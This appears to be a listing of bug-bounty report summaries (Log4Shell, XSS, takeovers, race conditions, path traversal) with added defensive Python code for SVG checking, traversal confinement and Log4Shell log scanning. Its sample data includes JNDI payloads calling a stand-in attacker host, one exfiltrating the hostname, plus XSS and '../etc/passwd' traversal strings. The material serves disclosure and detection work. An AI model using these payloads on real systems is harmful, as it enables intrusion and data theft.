15270 matches found
GitLab: Gitlab Pages token theft using service workers
Summary It is possible to steal Gitlab Pages session tokens by intercepting requests to the /auth endpoint on a Pages site using service workers. Attack Flow Setup 1. The attacker creates a private Gitlab Pages site at the root of their user page attacker.gitlab.io, ensuring that the project is...
Shopify: Github base action takeover which is used in `github.com/Shopify/unity-buy-sdk`
Summary: Shopify has a GitHub repository https://github.com/Shopify/unity-buy-sdk. In the repository there is a GitHub Action which uses a base action from an external GitHub repository. That GitHub account was not registered on github.com, so I was able to take over the account and host a PoC...
X (Formerly Twitter): Discoverability by phone number/email restriction bypass
Summary: By using this vulnerability an attacker can find a Twitter account by its phone number/email even if the user has prohibited this in the privacy options. Description: The vulnerability allows any party, without any authentication, to obtain a Twitter ID, which is almost equal to getting the...
Krisp: Unsubscribe links leaked
@blackxxhat pointed to some users' unsubscribe links that have been indexed in webarchive as the users themselves have posted them in forums, social media, or other websites. We encourage our users not to post URLs from https://url5145.krisp.ai/ because those links may be used to manipulate their...
U.S. Dept Of Defense: ███ ████████ running a vulnerable log4j
Report Description: https://vulners.com/cve/CVE-2021-44228 Impact Probably arbitrary code execution System Hosts ███████ Affected Products and Versions CVE Numbers CVE-2021-44228 Steps to Reproduce 1. Browse to https://██████████/█████████https%3A%2F%2F███%2F 2. Enter a...
Tennessee Valley Authority: No Rate Limit On Forgot Password Page
Vulnerability description not provided...
Cosmos: Race condition in faucet when using starport
Hi team, I and Aditya sent this bug over email on Wed, 29 Dec, 17:45 IST. Later we noticed that security reports are accepted via the HackerOne program. So, I am sending a copy of the bug report here. Summary: We were testing an application and we found a race condition bug in the faucet...
Brave Software: XSS on internal: privileged origin through reader mode
A vulnerability in Brave iOS versions 1.32.3 and higher allowed for XSS attacks on the privileged origin internal://local through the combination of two weaknesses. The first weakness was the exposure of uuidKey through the REFERER header due to the lack of referrer header protection in the...
Monero: DLL hijacking in Monero GUI for Windows 0.17.3.0 would allow an attacker to perform remote command execution
Summary: Monero for Windows contains a DLL hijacking vulnerability that allows an attacker to get a Metasploit Meterpreter remote shell. The moment the victim runs the program, it executes our malicious payload .dll, which gives the attacker a Meterpreter console. This will allow the attacker...
TikTok: URL Scheme misconfiguration on TikTok for iOS
A misconfigured URL schema on a TikTok iOS endpoint could have resulted in a user being forced to follow other accounts by visiting a malicious website or HTML page. We thank @glassplant for reporting this to our team...
X (Formerly Twitter): Improper sanitization of edit-list feature at Twitter leads to deletion of any Twitter user's list cover photo.
An improper sanitization of the edit list feature at Twitter allowed an attacker to delete any Twitter user's list cover photo. By manipulating the media ID in the request, the attacker could delete the victim's cover photo, violating access controls...
Acronis: SQL injection in https://demor.adr.acronis.com/ via the username parameter
Vulnerability description not provided...
Brave Software: Universal XSS with Playlist feature
A Universal XSS vulnerability was discovered in Brave iOS versions 1.32.3 and higher. The vulnerability was caused by three weaknesses, including the exposure of UserScriptManager.securityToken and UserScriptManager.messageHandlerToken, as well as a UXSS vulnerability in PlaylistHelper through...
U.S. Dept Of Defense: CUI Labelled document out in the open
Hi DoD VDP, I have found a document and each page of it is marked CUI : "Controlled Unclassified Information". According to your standards, this file shouldn't be publicly available on internet. This document was last edited on █████████ 2021. My investigation leads me to think it could have been...
U.S. Dept Of Defense: Arbitrary File Read at ███ via filename parameter
Arbitrary file reads with multiple endpoints on a DoD public-facing asset...
Brave Software: New XSS vector in ReaderMode with %READER-TITLE-NONCE%
A new XSS vulnerability was discovered in Brave iOS 1.31.1 and higher, which allowed attackers to execute malicious scripts on ReaderMode pages. The vulnerability was caused by a relaxation of the CSP rule, which allowed scripts with nonce-%READER-TITLE-NONCE% to be executed. Attackers could...
Acronis: Missing brute force protection on login page on www.acronis.com
A missing brute force protection vulnerability was discovered on the login page of www.acronis.com. This allowed attackers to launch brute force attacks on user accounts, potentially leading to unauthorized access...
Kubernetes: Github Account Takeover from Docs page of `kubernetes-csi.github.io`
Report Submission Form Summary: Kubernetes, in its docs at https://kubernetes-csi.github.io, has a drivers list. One of the drivers was pointing to an external GitHub account. That GitHub account was not registered on github.com, so I was able to take over the account and host a PoC. Kubernetes Version: NA...
MTN Group: Information disclosure through django debug mode
Summary: Your domain https://szezvzorilla.mtn.co.sz was disclosing information through Django debug mode being enabled. Steps To Reproduce: Visit https://szezvzorilla.mtn.co.sz/NONEXISTINGPATH/ You will see the debugging information. Supporting Material/References: F1555934 attachment / reference Impact...
JFrog: Impersonation attack via Broken link in "blog-author" page
A social media platform link for "Twitter" on https://jfrog.com/blog-author/john-peterson/ was broken and could've allowed a user to impersonate a reseller and attack / scam your customers. This happened because the Twitter account was either deleted or its username was changed. I thought I'd report ...
Kubernetes: Broken Domain Link Takeover from kubernetes.io docs
Report Submission Form Summary: Kubernetes docs have a Spanish translation available. One of the pages of the Portuguese doc has an external reference to a website. The website is not registered and can be purchased and used to host malicious content. Kubernetes Version: NA Component Version: NA...
Internet Bug Bounty: Buffer overflow in req_parsebody method in lua_request.c
Software Versions ------------------- Ubuntu - 18.04 32-bit Apache 2.4.51 32-bit Description ------------- This bug is present in the "req_parsebody" method of the modules/lua/lua_request.c file. The lines of code mentioned below cause this bug: ... size_t vlen = 0; ... ... vlen = end - crlf - 8; buffer =...
h1-ctf: Saving Christmas from Grinchy Gods
It was a fun CTF to play; I had some good learning on how to approach real-world targets and more things we can try while testing any target. Some nudges were good and reminded me of scenarios of how actual microservices are built, where these security issues can be present. Huge shoutouts to Ad...
h1-ctf: The Return of the Grinch
Read the full writeup here: https://github.com/tarifas90/CTF-Writeups-2021/blob/main/hackyholidasy2021.md...
TikTok: Cross site scripting via file upload in subdomain ads.tiktok.com
A file-upload cross-site scripting (XSS) vulnerability was found in the TikTok ads ticketing platform. Due to missing checks it was possible to upload .svg files which contained an XSS payload. We thank @blubluuu for reporting this to our team and confirming its resolution...
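An upload check for the SVG case above, added here as an example and not code from TikTok or from the report: an SVG is XML, so a browser that renders it inline will run <script> elements, on* event-handler attributes and javascript: links. The checker parses the file and rejects it on any of those. The two sample documents are constructed for this example.

```python
import xml.etree.ElementTree as ET

# Element local names that let an SVG execute script or embed foreign content.
DANGEROUS_TAGS = {"script", "foreignObject", "iframe", "object", "embed", "handler"}
# Attribute local names that carry a URL; javascript:/data: values are rejected.
URL_ATTRS = {"href", "src"}

# Constructed sample uploads (not taken from any report on this page).
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <circle cx="50" cy="50" r="40" fill="#0a0"/>
</svg>"""

MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink">
  <script>alert(document.domain)</script>
  <a xlink:href="java&#10;script:alert(1)"><text x="10" y="20">click</text></a>
  <rect width="10" height="10" onload="alert(1)"/>
</svg>"""


def _local(name):
    """Strip an XML namespace prefix such as {http://www.w3.org/1999/xlink}."""
    return name.rsplit("}", 1)[-1]


def svg_findings(data):
    """Return the reasons an uploaded SVG should be rejected (empty list = clean)."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"unparseable XML: {exc}"]
    findings = []
    if _local(root.tag) != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")
    for el in root.iter():
        tag = _local(el.tag)
        if tag in DANGEROUS_TAGS:
            findings.append(f"forbidden element <{tag}>")
        for attr, value in el.attrib.items():
            name = _local(attr)
            # Collapse whitespace so "java\nscript:" is still recognised.
            v = "".join(value.split()).lower()
            if name.lower().startswith("on"):
                findings.append(f"event handler attribute {name} on <{tag}>")
            elif name in URL_ATTRS and (v.startswith("javascript:") or v.startswith("data:")):
                findings.append(f"active URL in {name} on <{tag}>: {value[:40]}")
            elif name == "style" and "url(" in v:
                findings.append(f"external reference in style on <{tag}>")
    return findings


def is_safe_svg(data):
    return not svg_findings(data)


if __name__ == "__main__":
    print("benign:", svg_findings(BENIGN_SVG))
    print("malicious:", svg_findings(MALICIOUS_SVG))
```

Rejecting script is only half the fix: even a clean SVG served from the application origin can later be abused by a bypass, so user-supplied SVGs should be rasterised or served from a separate, cookie-less origin with Content-Disposition: attachment. For untrusted XML in production, defusedxml's drop-in parsers also close the entity-expansion attacks that the standard library parser does not.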
S-Pankki: Email/OTP verification bypass leads to Pre-Account Takeover.
Handled in https://jira.sok.fi/browse/VOIK-6267...
Krisp: Log4j CVE-2021–44228
The researcher's canary token got DNS interaction, which raised a false sense of log4shell vulnerability. $hostName would be exfiltrated if any of the processing servers were vulnerable, but as seen in the video submitted by the researcher just a plain DNS resolving was made...
Node.js: Prototype pollution via console.table properties
Summary: Attacker control of the second properties parameter of console.table may lead to prototype pollution. Description: Due to the formatting logic of the console.table function it is not safe to allow user controlled input to be passed to the properties parameter while simultaneously passing...
Acronis: [forum.acronis.com] JNDI Code Injection due an outdated log4j component
Vulnerability description not provided...
RubyGems: Dependency repository hijacking aka Repo Jacking from GitHub repo rubygems/bundler-site & rubygems/bundler.github.io + bundler.io docs
Dependency repository hijacking aka repo jacking is an obscure supply chain vulnerability, conceptually similar to subdomain takeover. When the linked repository owner changes their username, it becomes immediately available to be re-registered by anyone. This means that any project that linked...
Node.js: Node.js Certificate Verification Bypass via String Injection
This is a report on behalf of Google, who did not want to report through H1. --- Summary Node’s APIs for reporting certificate fields are ambiguous and allow bypassing certificate verification in some circumstances. Details In light of CVE-2021-3712, I’ve been looking at code which misuses...
Ruby on Rails: Subdomain Takeover at https://new.rubyonrails.org/
Disclaimer I know it's OOS but the issue is pretty serious because of the attractive domain name "new.rubyonrails.org" basically anyone could have put malware there. Summary Hi! I discovered that new.rubyonrails.org was pointing to an unclaimed Github Page, making it vulnerable to subdomain...
U.S. Dept Of Defense: Log4Shell: RCE 0-day exploit on █████████
Hi team, Log4Shell is a recent 0-day exploit; it's a vulnerable Java package. The ██████████ domain is vulnerable. Impact RCE System Hosts █████████ Affected Products and Versions CVE Numbers CVE-2021-44228 Steps to Reproduce 1. Go to this url =...
Showmax: Race Condition Vulnerability when creating profiles
Summary: This report describes a race condition vulnerability which allows a user to create as many profiles as he wishes, which contradicts your business logic. I was only allowed to create six profiles on my account, but using this bug I was able to create 30 profiles for free. Description: There is a race...
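The profile-limit race above, reproduced as an in-process simulation (added example; not Showmax's code and not the reporter's script). The vulnerable account checks the count and then inserts with nothing tying the two together, so concurrent requests all pass the check before any insert lands; a threading.Barrier forces that interleaving deterministically instead of relying on timing. The hardened account does check-and-insert under one lock, which is what a database transaction with a row lock or a constraint does on a real server.

```python
import threading

PROFILE_LIMIT = 6  # assumed business limit, taken from the report above


class VulnerableAccount:
    """Check-then-act with no atomicity: the limit check and the insert
    can interleave across concurrent requests."""

    def __init__(self, gate):
        self.profiles = []
        # Barrier models the window between the count query and the insert;
        # every request reaches it before any request inserts.
        self._gate = gate

    def create_profile(self, name):
        if len(self.profiles) >= PROFILE_LIMIT:
            return False
        self._gate.wait()
        self.profiles.append(name)
        return True


class HardenedAccount:
    """Check and insert happen under one lock, so the count seen by the
    check is the count at insert time."""

    def __init__(self):
        self.profiles = []
        self._lock = threading.Lock()

    def create_profile(self, name):
        with self._lock:
            if len(self.profiles) >= PROFILE_LIMIT:
                return False
            self.profiles.append(name)
            return True


def fire_concurrent(account, n):
    """Send n create-profile requests at once and return the resulting count."""
    threads = [
        threading.Thread(target=account.create_profile, args=(f"profile-{i}",))
        for i in range(n)
    ]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return len(account.profiles)


def demo(n=30):
    """Return (profiles created on vulnerable account, on hardened account)."""
    vulnerable = VulnerableAccount(threading.Barrier(n))
    hardened = HardenedAccount()
    return fire_concurrent(vulnerable, n), fire_concurrent(hardened, n)


if __name__ == "__main__":
    print(demo())
```

Against a live target the same effect is produced by sending the requests in parallel (for example HTTP/2 multiplexing or a thread pool) so they arrive inside the check-to-insert window; the fix has to live in the data layer, because application-side locks do not hold across multiple server instances.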
Dropbox: Send Fax from Anyone's HelloFax Account Due to Misconfigured Email Validation
The report demonstrates a method of using up HelloFax credits by forging email requests. A fix for the issue has been released and it was applied for existing and new users through an automatic update. An attacker could exploit this vulnerability by entering a victim’s HelloFax line number into a...
Judge.me : Stored XSS in Question edit for product name (bypass #1416672)
Hi @judgeme! Step to reproduce: 1. Log in to your Shopify account and create a product with name <img src=x onerror=prompt(document.domain)> <img src=x onerror=prompt(document.domain)> 2. Go to our store and write a question to our product with name <img src=x onerror=prompt(document.domain)> <img src=x...
Judge.me : Log4j RCE on https://judge.me/reviews
Summary: CVE-2021-44228, also named Log4Shell or LogJam, is a Remote Code Execution (RCE) class vulnerability. If attackers manage to exploit it on one of the servers, they gain the ability to execute arbitrary code and potentially take full control of the system. What makes CVE-2021-44228 especial...
MTN Group: path traversal vulnerability in Grafana 8.x allows " local file read "
Hi team, I've found a path traversal issue in the Grafana instances hosted on the MTN platforms. With the path traversal it's possible for an unauthenticated user to read arbitrary files on the server. This IP "41.242.91.22" / Domain Name "mtn.com.gn" is for MTN Group. F1545670 F1545682 Steps To...
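The bug class behind the DoD "filename parameter" file read and the Grafana path traversal above, shown as an added example (not Grafana's code, not the reporters' requests): a handler that joins user input onto a web root lets ../ segments, or an absolute path, walk out of it. The hardened version canonicalises the result and refuses anything whose real path is not under the root. The base directory is a placeholder.

```python
import os


def vulnerable_join(base_dir, requested):
    """The bug: user input appended to a directory with no confinement.
    '../' walks out of base_dir, and an absolute request discards it entirely
    (os.path.join('/srv/app', '/etc/passwd') == '/etc/passwd')."""
    return os.path.join(base_dir, requested)


def safe_join(base_dir, requested):
    """Resolve requested under base_dir; raise PermissionError if it escapes."""
    base = os.path.realpath(base_dir)
    # Treat the request as relative even if it starts with a slash.
    candidate = os.path.realpath(os.path.join(base, requested.lstrip("/\\")))
    # realpath has already collapsed '..' and followed symlinks, so a plain
    # prefix check on the canonical form is sufficient.
    if os.path.commonpath([base, candidate]) != base:
        raise PermissionError(f"path escapes {base}: {requested!r}")
    return candidate


def escapes_base(base_dir, path):
    """True if the canonical form of path lies outside base_dir."""
    base = os.path.realpath(base_dir)
    return os.path.commonpath([base, os.path.realpath(path)]) != base


BASE = "/srv/app/public"  # hypothetical web root for the demonstration

if __name__ == "__main__":
    for req in ("plugins/x/a.js", "../../../etc/passwd", "/etc/passwd"):
        print(req, "->", vulnerable_join(BASE, req),
              "escapes" if escapes_base(BASE, vulnerable_join(BASE, req)) else "inside")
        try:
            print("  safe_join:", safe_join(BASE, req))
        except PermissionError as exc:
            print("  safe_join: rejected:", exc)
```

Do the check after the framework has URL-decoded the path (so %2e%2e%2f is caught as ../) and after any symlinks in the tree are resolved, which is why the comparison uses realpath on both sides rather than a string test on the raw request; a denylist of "../" alone misses absolute paths and encoded variants.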
Reddit: No rate limit on password reset leads to email enumeration at gateway-production.dubsmash.com
Summary: I found a brute-force issue on gateway-production.dubsmash.com: valid usernames and emails can be found, with no rate limit. Impact: an attacker could collect all usernames and valid emails through brute force on forgot password. Steps To Reproduce: open gateway-production.dubsmash.com, go to forgot email, and enter...
Judge.me : stored XSS on AliExpress Review Importer/Products when delete product
Hi @judgeme! Step to reproduce: 1. Go to Shopify admin and create a product with name ""<img src=x onerror=prompt()> 2. Go to AliExpress Review Importer/Products and delete our product with name "<img src=x onerror=prompt(document.domain)> F1544890 3. XSS works. P.S. PoC video attached F1544893 Impact...
MTN Group: Remote code injection in Log4j on https://mymtn.mtncongo.net - CVE-2021-44228
The website https://mymtn.mtncongo.net was vulnerable to remote code injection due to the CVE-2021-44228 vulnerability in the Log4j library. This critical vulnerability allowed for remote command execution...
MTN Group: Remote code injection in Log4j on http://mtn1app.mtncameroon.net - CVE-2021-44228
The vulnerability CVE-2021-44228, a remote code injection flaw in Log4j, was discovered on the website http://mtn1app.mtncameroon.net. The vulnerability was confirmed to be present on the ports 8080 and 8443 of the website. The issue was demonstrated by retrieving the hostname of the affected...
Acronis: [CVE-2021-44228] nps.acronis.com is vulnerable to the recent log4shell 0-day
Summary The website at nps.acronis.com is vulnerable to CVE-2021-44228. Steps To Reproduce I used this script to find this. It spins up an interact.sh server to receive the callback and sends the payload in the query string and about 30 different headers. You can reproduce manually with curl and...
FetLife: Able to access private picture/video/writing when requesting for their JSON response
Description Endpoint https://fetlife.com/users/user-id/pictures/pic-id has 2 types of responses, HTML and JSON. The type of response depends on the Accept header of the request it gets. If the request contains Accept: application/json, then it returns a JSON response. Otherwise, it returns HTML...
Glassdoor: Web Cache Poisoning leads to Stored XSS
@bombon reported to us a web cache poisoning issue that led to caching of gdTokenAnti-CSRF token across different Glassdoor pages and in some instances could be chained to perform XSS by caching the XSS payload. This has now been resolved using CF web cache armor and cache-control headers...
FetLife: Able to detect if a user is FetLife supporter although this user hides their support badge in fetlife.com/conversations/{id} JSON response
UserA is a FetLife supporter; he also hides his support badge in his account privacy settings so that people don't know he is a supporter. However, UserB can start a conversation with UserA and, by looking at the issupporter field in the JSON response of their conversation, UserB knows that UserA is a...
U.S. Dept Of Defense: ██████████ running a vulnerable log4j
Description: https://vulners.com/cve/CVE-2021-44228 Impact Probably arbitrary code execution System Hosts ████████ Affected Products and Versions CVE Numbers CVE-2021-44228 Steps to Reproduce 1. Browse to https://████████/███████https%3A%2F%2F█████████%2F 2. Enter a...
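Detection logic for the Log4Shell entries on this page (Acronis, MTN, DoD, Judge.me, Krisp), added here as an example and not taken from any of those reports: the Acronis entry notes the payload is sprayed across the query string and some 30 headers, and the Krisp entry notes that a bare DNS resolution of the canary domain is not proof of exploitation. The scanner URL-decodes each log line, collapses the common lookup obfuscations (${::-j}, ${lower:j}, ${env:X:-j}) and then looks for a JNDI lookup; a second helper classifies names that reach the callback server so that "attacker.example was resolved" is not mistaken for "${hostName} was evaluated". The log lines and the callback domain are constructed for this example.

```python
import re
from urllib.parse import unquote

# ${anything:-default} -> default   (covers ${::-j} and ${env:NaN:-j})
_DEFAULT_RE = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# ${lower:x} / ${upper:x} -> x
_CASE_RE = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# The lookup we care about, with its URL scheme captured.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)

CANARY_DOMAIN = "attacker.example"  # hypothetical callback domain for the example

# Constructed access-log lines in combined format (not from any report above).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Dec/2021:10:01:02 +0000] "GET /login?user=${jndi:ldap://attacker.example/a} HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [12/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:rmi://attacker.example/b}"
10.0.0.7 - - [12/Dec/2021:10:01:04 +0000] "GET /api?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Aldap%3A%2F%2Fattacker.example%2Fc%7D HTTP/1.1" 200 10 "-" "curl/7.68"
10.0.0.8 - - [12/Dec/2021:10:01:05 +0000] "GET /search?q=${env:HOME} HTTP/1.1" 200 10 "-" "curl/7.68"
10.0.0.9 - - [12/Dec/2021:10:01:06 +0000] "POST /ping HTTP/1.1" 200 10 "-" "${jndi:dns://${hostName}.attacker.example}"
"""


def normalize(text):
    """Resolve nested obfuscation lookups until nothing changes."""
    prev = None
    while prev != text:
        prev = text
        text = _DEFAULT_RE.sub(r"\1", text)
        text = _CASE_RE.sub(lambda m: m.group(1), text)
    return text


def find_jndi(line):
    """Return the JNDI scheme (ldap, rmi, dns, ...) found in a log line, or None."""
    m = JNDI_RE.search(normalize(unquote(line)))
    return m.group(1).lower() if m else None


def scan(log_text):
    """List (line number, scheme) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        scheme = find_jndi(line)
        if scheme:
            hits.append((n, scheme))
    return hits


def classify_callback(queried_name):
    """Tell whether a name seen at the canary's DNS server proves evaluation.
    A bare resolution of the canary domain is what a WAF, URL scanner or link
    checker does; only a prepended label shows ${hostName} was substituted."""
    name = queried_name.rstrip(".").lower()
    if name == CANARY_DOMAIN:
        return "bare-resolution"
    if name.endswith("." + CANARY_DOMAIN):
        return "lookup-evaluated:" + name[: -len(CANARY_DOMAIN) - 1]
    return "unrelated"


if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
    print(classify_callback("attacker.example"))
    print(classify_callback("web-01.attacker.example."))
```

A hit in the logs means the payload was received, not that Log4j evaluated it; the confirmation is the callback whose leading label carries the substituted value, which is the distinction the Krisp triage above draws. The fourth sample line (${env:HOME}) is deliberately not flagged: it is a lookup but not a JNDI one, and a stricter deployment may want to alert on any ${ in request data.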
U.S. Dept Of Defense: Wrong settings in ADF Faces leads to information disclosure
Hello, Team. Found some interesting links which lead to information disclosure in █████ Link 1: █████████████ Link 2: ██████████████████ Link 3: █████████████ Every link goes through https://██████ to https://████ For Link 3 it is possible to change data in the fields: First Name, Last Name, Phone...
Yelp: Fraudulent claim of business.
Vulnerability description not provided...
Shopify: Direct Access To admin Dashboard
This issue affects two subdomains, https://data-stories-website.shopifycloud.com/admin.php and https://datastories.shopify.com/admin.php Summary: Hi Team, when linking to https://datastories.shopify.com/admin or https://data-stories-website.shopifycloud.com/admin the subdomain redirects you to...